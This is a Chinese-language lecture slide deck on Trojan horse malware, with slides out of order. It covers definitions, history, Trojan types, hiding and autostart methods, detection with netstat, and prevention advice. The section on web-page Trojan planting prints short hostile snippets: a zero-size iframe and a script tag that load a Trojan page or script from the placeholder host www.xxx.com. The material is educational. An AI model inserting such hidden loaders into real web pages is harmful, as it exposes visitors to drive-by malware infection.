特洛伊木马
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
• 木马的最终意图是窃取信息、实施远程监控 • 木马与合法远程控制软件(如pcAnyWhere)的主要区别在于是 否具有隐蔽性、是否具有非授权性
木马的组成
• 木马系统软件一般由木马配置程序、控制程序和木马程序(服 务器程序)三部分组成
配置 控制 响应
配置程序
木马程序
控制程序 木马服务器 木马控制端(客户端)
特洛伊木马
内容概要
木马的概念
木马的危害
木马的隐藏和传播技术 典型木马分析与防范措施
2
特洛伊木马(Trojan Horse)
• 特洛伊木马(Trojan Horse),简称木马,是一种恶意 程序,是一种基于远程控制的黑客工具,一旦侵入用 户的计算机,就悄悄地在宿主计算机上运行,在用户 毫无察觉的情况下,让攻击者获得远程访问和控制系 统的权限,进而在用户的计算机中修改文件、修改注 册表、控制鼠标、监视/控制键盘,或窃取用户信息. • 古希腊特洛伊之战中利用木马攻陷特洛伊城;现代网 络攻击者利用木马,采用伪装、欺骗(哄骗, Spoofing)等手段进入被攻击的计算机系统中,窃取 信息,实施远程监控
7
木马控制端与服务端连接的建立
• 木马通道与远程控制
– 木马连接建立后,控制端端口和服务端木马端口之间将会出现一 条通道 – 控制端上的控制端程序可藉这条通道与服务端上的木马程序取得 联系,并通过木马程序对服务端进行远程控制,实现的远程控制 就如同本地操作
控制端 控制端 程序 1096 6267 服务端 木马 程序 窃取密码 文件操作 修改注册表 系统操作
• 在任务栏里隐藏
– 通过VB编程中属性设置实现自身不出现在任务栏中
• 端口修改
– 使用非常用端口,或高位端口 – 自己修改端口
25
检测和清除木马的方法
– Windows XP的 Netstat工具提供 了一个新的-o选 项,能够显示出 正在使用端口的 程序或服务的进 程标识符(PID)。 有了PID,用任务 管理器就可以方 便地根据PID找到 对应的程序,以 便终止之
13
特洛伊木马的演变
• 第三代木马:网络传播型木马 – 随着Internet的普及,这一代木马兼备伪 装和传播两种特征并结合TCP/IP网络技 术四处泛滥。同时他还添加了“后门” 和击键记录等功能。 – 所谓后门就是一种可以为计算机系统秘 密开启访问入口的程序。 – 击键记录的功能功能主要是记录用户所 有的击键内容然后形成击键记录的日志 14 文件发送给恶意用户。
防范措施
1)使用正版防毒软件,并及时更新防毒病毒码; 2)及时打上系统和软件补丁; 3)不要访问色情、黑客等不良网站; 4)不要轻易相信“朋友”发来的链接和程序,对于下载的软件应该先查毒,然后 才能运行; 5)陌生人的邮件勿轻易打开; 6)定期更新密码,尤其是银行账号、游戏账号等的密码; 7) 使用防毒软件定期扫描系统。 对于企业用户而言还应做好以下几点: 1)加强网络管理,关闭不必要的网络端口和应用; 2)使用网络版的防毒软件,可以进行全网管理; 3)加强用户安全意识教育; 4)做好安全监控和病毒事件应急响应; 5)监控Web服务器是否挂马,有条件者可以寻求专业防毒机构和专业人士的支持 。
• 邮件炸弹木马 一旦机器被感染,木马就会随机生成各种各样主题的信件, 对特定的邮箱不停地发送邮件,一直到对方瘫痪、不能接受 邮件为止
20
20
代理木马
• 黑客在入侵的同时掩盖自己的足迹 • 给被控制的肉鸡种上代理木马 • 攻击者可以在匿名的情况下使用Telnet,ICQ,IRC等程序
查杀代理木马 系统比较慢,上网速度也慢下来,就有 可能是中了代理木马,先调用杀毒软件,升 级后在安全模式下全盘杀毒。
5
木马入侵基本过程
控制端 ①配置木马 ②传播木马 ③运行木马 Internet 木马 服务端
④信息反馈
信息
⑤建立连接
⑥远程控制
6
netstat查看木马打开的端口
Proto ① TCP ② TCP Local Address 202.102.47.56 : 6267 202.102.47.56 : 6267 服务端 IP地址 木马 端口 Foreign Address 202.96.96.102 : 1096 0.0.0.0 控制端 IP地址 控制端 端口 State ESTABLISHED LISTENING 连接状态: ①连接已建立 ②等待连接
32
网页挂马技术(二)
• js调用型网页挂马
– 利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术
<script language=javascript
src=http://www.xxx.com/gm.js></script>
http://www.xxx.com/gm.js就是一个js脚本文件,通过它调用和执行木 马的服务端。这些js文件一般都可以通过工具生成,攻击者只需输入相关 的选项就可以了
• 钓鱼欺骗(Phishing)
– 构造一个链接或者一个网页 – 利用社会工程学欺骗方法 – 欺骗用户输入某些个人,隐私信息,然后窃取个人隐私
• 漏洞攻击
– 利用操作系统和应用软件的漏洞进行的攻
30
常见传播方式(二)
• 网页挂马
– 网页挂马就是攻击者通过在正常的页面中(通常是网站的主页 )插入一段代码。浏览者在打开该页面的时候,这段代码被执 行,然后下载并运行某木马的服务器端程序,进而控制浏览者 的主机
注:当用户打开http://www.xxx.com/test.htm是,显示给用户的是 http://www.xxx.com/test.jpg,而http://www.xxx.com/test.htm网页代 码也随之运行。
34
TROJ_WIDGET.046
1. 用户从互联网 下载免费软件
35
特洛伊木马防范措施
进程标识符PID与映射名称
隐藏技术(二)
• 隐藏通讯
– 占领 80HTTP端口 – 收到正常的HTTP请求仍然把它交与Web服务器处理,只有收到 一些特殊约定的数据包后,才调用木马程序
• 隐藏加载方式
– – – – – – – – – 在Win.ini中启动 在System.ini中启动 利用注册表加载运行 在Autoexec.bat和Config.sys中加载运行 在Winstart.bat中启动 启动组 *.INI 修改文件关联 捆绑文件
18
18
键盘记录木马
• 记录受害者的键盘敲击并且在LOG文件里查找密码 • 随着Windows启动 • 同时具有邮件发送功能
19
DoS ( Denial of Service的简称,即拒绝服务) 攻击木马
• 入侵一台机器 • 将该计算机做为DoS攻击的平台,也称为肉鸡 • 攻击者可以利用它来攻击一台又一台计算机,给网络造成很 大的伤害和带来损失
37
31
网页挂马技术(一)
• 框架嵌入式网络挂马
– 将网页木马利用frame语句加载到任意网页中
<iframe src=http://www.xxx.com/muma.html
wiຫໍສະໝຸດ Baiduth=0
height=0></iframe>
解释:在打开插入该句代码的网页后,就也就打开了 http://www.xxx.com/muma.html页面,但是由于它的长和宽都为“0”,所以 很难察觉,非常具有隐蔽性。
特洛伊木马类型
破坏型木马
• 破坏并且删除文件 • 删除DLL、INI、EXE文件
16
密码发送型
• 查找相关密码 • 发送指定邮件(控制者) 获取密码的方法:
– 搜索密码文件 – 记录键盘操作 – 暴力破译加密文件
17
17
远程访问型
• 只需有人运行了服务端程序,如果客户知道了服务端的IP 地址,就可以实现远程控制。 • 利用程序可以实现观察“受害者”正在干什么 • 可用于计算机远程监控和远程排错等操作
27
隐藏技术(三)
• 最新隐身技术
– 修改虚拟设备驱动程序(VXD) – 修改动态链接库 (DLL) – 将修改后的DLL替换系统已知的DLL,并对所有的函数调 用进行过滤
– 优势: 没有增加新的文件 不需要打开新的端口 没有新的进程产生
28
特洛伊木马的传播
常见传播方式(一)
• 捆绑欺骗
– 把木马服务端和某个游戏/软件捆绑成一个文件 – 通过即时通讯工具、邮件、下载工具等渠道发送出去
21
FTP木马
• 功能就是打开21端口,等待用户连接 • 对端口进行加密,只有攻击者本人才知道正确的密码, 从而进入对方计算机
22
程序杀手木马
• 关闭对方机器上运行的防木马程序 • 让其他的木马更好地发挥作用。
23
特洛伊木马隐藏技术
隐藏技术(一)
• 在任务管理器里隐藏
– 任务管理器中查看不到木马进程 – 木马将自己设成“系统服务”
33
网页挂马技术(三)
• 图片伪装挂马
– 攻击者直接将网页木马加载到图片中
http://www.xxx.com/test.htm中的木马代码植入到test.jpg图片文件中
图片木马生成后,再利用代码调用执行,实例代码如:
<html> <iframe src="http://www.xxx.com/test.htm" height=0 width=0> </iframe> <img src="http://www.xxx.com/test.jpg"></center> </html>
木马&病毒
• 木马与病毒
– 一般情况下,病毒是依据其能够进行自我复制即传染性的特点 而定义的 – 特洛伊木马主要是根据它的有效载体,或者是其功能来定义的 ,更多情况下是根据其意图来定义的 – 木马一般不进行自我复制,但具有寄生性,如捆绑在合法程序 中得到安装、启动木马的权限,DLL木马甚至采用动态嵌入技术 寄生在合法程序的进程中 – 木马一般不具有普通病毒所具有的自我繁殖、主动感染传播等 特性,但我们习惯上将其纳入广义病毒,也就是说,木马也是 广义病毒的一个子类
特洛伊木马简史
•第一代木马 :伪装型 通过伪装成一个合法性程 序诱骗用户上当
11
伪装型木马
12
特洛伊木马的演变
• 第二代木马 : AIDS 型 1989 年出现 ,EMAIL未普及.利用现实生活中的邮件进 行散播:给其他人寄去一封封含有木马程 序软盘的邮件。之所以叫这个名称是因为 软盘中包含有 AIDS 和 HIV 疾病的药品, 价格,预防措施等相关信息。软盘中的木 马程序在运行后,虽然不会破坏数据,但 是他将硬盘加密锁死,然后提示受感染用 户花钱消灾